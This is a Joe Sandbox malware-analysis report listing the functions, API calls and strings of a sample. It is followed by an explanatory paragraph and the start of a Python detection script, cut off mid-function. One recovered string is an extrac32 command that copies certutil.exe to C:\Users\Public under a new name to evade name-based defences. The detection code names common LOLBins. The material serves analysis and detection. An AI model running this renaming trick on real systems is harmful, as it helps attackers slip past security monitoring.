                                                                                          • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                          • String ID:
                                                                                          • API String ID: 734197835-0
                                                                                          • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                          • Instruction ID: 5e4973f028198ab8c6ba09249c9622450de310072cb6f47662f0fb61c47c708d
                                                                                          • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                          • Instruction Fuzzy Hash: 02619432E0E693AAE7608B25A8043797BA1BB89B55F448131DD9EC3795DF3CA449E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Enum$Openwcsrchr
                                                                                          • String ID: %s=%s$.$\Shell\Open\Command
                                                                                          • API String ID: 3402383852-1459555574
                                                                                          • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                          • Instruction ID: de9aa223e584927818a56efc5ae29e946791a1c024a65473f014f2a003b068a0
                                                                                          • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                          • Instruction Fuzzy Hash: EFA1B172A0A683A3EE109B59E4502BAE2A0FF85BD0F944531DA4E877D5EF7CED41D300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$wcscmp
                                                                                          • String ID: %s
                                                                                          • API String ID: 243296809-3043279178
                                                                                          • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                          • Instruction ID: 269e0ad1386bfb1413ca2fdf6a876ec6c0e71df9f0a399257e0e315a2ce8a572
                                                                                          • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                          • Instruction Fuzzy Hash: FCA17E32B0AB87A6EB65DB21D8903F963A0FB48749F144036DA4D87795EF3CE649D300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$EnvironmentVariable
                                                                                          • String ID: DIRCMD
                                                                                          • API String ID: 1405722092-1465291664
                                                                                          • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                          • Instruction ID: 8dda3b96f36f566e64158eb1e224687d7da104e9b7fa2fc1b40c95090797352f
                                                                                          • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                          • Instruction Fuzzy Hash: 57815F72A0ABC29AEB20CF60E8802ED77E5FB49748F504139DA8D97B59DF38D255D700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79A39
                                                                                            • Part of subcall function 00007FF6A0E7DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF6A0E7CEAA), ref: 00007FF6A0E7DFB8
                                                                                            • Part of subcall function 00007FF6A0E7DF60: RtlFreeHeap.NTDLL ref: 00007FF6A0E7DFCC
                                                                                            • Part of subcall function 00007FF6A0E7DF60: _setjmp.MSVCRT ref: 00007FF6A0E7E03E
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79AF0
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79B0F
                                                                                            • Part of subcall function 00007FF6A0E796E8: memset.MSVCRT ref: 00007FF6A0E797B2
                                                                                            • Part of subcall function 00007FF6A0E796E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E79880
                                                                                          • _wcsupr.MSVCRT ref: 00007FF6A0E8B844
                                                                                          • wcscmp.MSVCRT ref: 00007FF6A0E8B86D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                          • String ID: FOR$ IF
                                                                                          • API String ID: 3663254013-2924197646
                                                                                          • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                          • Instruction ID: aca1efef3432236f12edc8d61b4727c8b43886cbee9c64109d6b98edc9748058
                                                                                          • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                          • Instruction Fuzzy Hash: EA51AC31F0BB43A6FE58AB25945027966A1FF89B90F584235DA1ED77D2DE3CE805A300
                                                                                          APIs
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F0D6
                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1BA
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F1E7
                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1FF
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F2BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                          • String ID: )$=,;
                                                                                          • API String ID: 1959970872-2167043656
                                                                                          • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                          • Instruction ID: 63000e758ed284127b4c02d36b41793333cbdfab48e23bb45371ff7b1af3f81f
                                                                                          • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                          • Instruction Fuzzy Hash: FF41CF72E0B253E6FBA08B15E55437976E0BF55751F849035CE8CC23A2DF3CA8A1A700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                          • String ID: %04X-%04X$:
                                                                                          • API String ID: 930873262-1938371929
                                                                                          • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                          • Instruction ID: 57f97cd7c20d12d1be780781af9204cd114e99c9ad880aeff7a729c657da3a33
                                                                                          • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                          • Instruction Fuzzy Hash: 3E41D031A0EA83E2EB649B20E5502BAB3A0FF88741F504536EA5E837D5DF3CE544E710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                          • API String ID: 3249344982-2616576482
                                                                                          • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                          • Instruction ID: 6eadcb6025df01fe4c7fa27d6582fe5b37bf05511ad17e51780853cc84aa3839
                                                                                          • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                          • Instruction Fuzzy Hash: 47417172619B8296E3108F21A84436ABAA4FB8DBD5F448235EA4D87794CF7DD4199B00
                                                                                          APIs
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86A73
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86A91
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86AB0
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86AE3
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86B01
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$iswdigit
                                                                                          • String ID: +-~!$<>+-*/%()|^&=,
                                                                                          • API String ID: 2770779731-632268628
                                                                                          • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                          • Instruction ID: b03abbd8d4413db24ecdd0d70715ae4dda8eedd753cfafcf4aadb48eb9535333
                                                                                          • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                          • Instruction Fuzzy Hash: 3931F932A0AA57A5EB549F51E45027977F0FB89F89F558135DA4E83394EF3CE408E310
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                          • String ID:
                                                                                          • API String ID: 3192234081-0
                                                                                          • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                          • Instruction ID: 4495a102ae481a27643e5c004b8683a8358f76e9239c391bd8b3eb2c2d628ff6
                                                                                          • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                          • Instruction Fuzzy Hash: 69319131709693ABE710AF31E44467DFBA0FB89B91F449134EE9A877A6CE3CD4019B00
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81673
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8168D
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81757
                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8176E
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81788
                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8179C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$Alloc$Size
                                                                                          • String ID:
                                                                                          • API String ID: 3586862581-0
                                                                                          • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                          • Instruction ID: 33246000a8bbe347cd3cb99fae34ea1e1714bfbfd4575d5a17ad16b855c513bc
                                                                                          • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                          • Instruction Fuzzy Hash: BF917C72A0AB43A2EA158B15E440379B7E4FB49B90F598136DE4D837A0DF3CE449E340
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                          • String ID:
                                                                                          • API String ID: 1313749407-0
                                                                                          • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                          • Instruction ID: a159577ad3e3f8a6b951397a439d883a06b6326ea77635c09b315f45b4eee1e7
                                                                                          • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                          • Instruction Fuzzy Hash: CC51C632E0B6C362FA549B26A904279A6A5FF49B90F685235DD1EC77D1DF3CE844A300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                          • String ID:
                                                                                          • API String ID: 920682188-0
                                                                                          • Opcode ID: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                          • Instruction ID: 1101fc48485642febb401ed2702c12d48870c5e852e16df3a434bcfed0f08e74
                                                                                          • Opcode Fuzzy Hash: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                          • Instruction Fuzzy Hash: 1C512832706BC69AEB25DF24D8542E8B7A1FB88B85F048135DA4E87764EF3CD649D700
                                                                                          APIs
                                                                                          Strings
                                                                                          • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF6A0E7E00B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$FreeProcess_setjmp
                                                                                          • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                          • API String ID: 777023205-3344945345
                                                                                          • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                          • Instruction ID: d404c9a90c688e21cb10f23051cfabf00d508866b7b7ad2e358dfe5a6fe026e9
                                                                                          • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                          • Instruction Fuzzy Hash: 94514A32D0FB43E5FB558B15A890279B7A0FF8A794F548536D90EC23A2DF7CA440A700
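The string recovered from this function, `extrac32 /C /Y C:\Windows\System32\certutil.exe C:\Users\Public\kn.exe` (the report shows the backslashes doubled; the command line itself uses single backslashes), is the step behind the "Drops or copies certutil.exe with a different name (likely to bypass HIPS)" signature: a built-in copy tool places a system binary in a world-writable folder under a new name so that name-based HIPS/AV rules never see "certutil.exe" run. The following detection sketch is an added example and is not part of the Joe Sandbox report or the sample; it assumes Sysmon Event ID 1 field names (Image, CommandLine, OriginalFileName), uses constructed sample events, and treats the LOLBIN list and the user-writable path prefixes as tunable assumptions. It generalises the single extrac32 case to expand.exe, which copies an uncompressed file with the same SRC DST form.

```python
"""Flag the renamed-LOLBin copy seen in this report (added example, not report code).

Two independent checks catch the technique:
  1. a built-in copy tool moving a system binary into a user-writable path, and renaming it;
  2. a running process whose PE OriginalFileName does not match its on-disk file name.
Field names follow Sysmon Event ID 1; SAMPLE_EVENTS below are constructed for this example.
"""
import ntpath
import shlex

# System binaries commonly copied under a new name (assumption: extend for your estate).
LOLBINS = {"certutil.exe", "cmd.exe", "extrac32.exe", "expand.exe", "esentutl.exe",
           "mshta.exe", "regsvr32.exe", "rundll32.exe", "powershell.exe"}
# Prefixes any interactive user can write to (assumption); a system binary landing here is a red flag.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def parse_copy(cmdline):
    """Return (src, dst) if cmdline is an `extrac32 /C SRC DST` or `expand SRC DST` copy, else None.

    Switches (/Y, /E, /L, -r ...) are skipped and quoted paths are unquoted.
    posix=False keeps Windows backslashes literal instead of treating them as escapes.
    """
    try:
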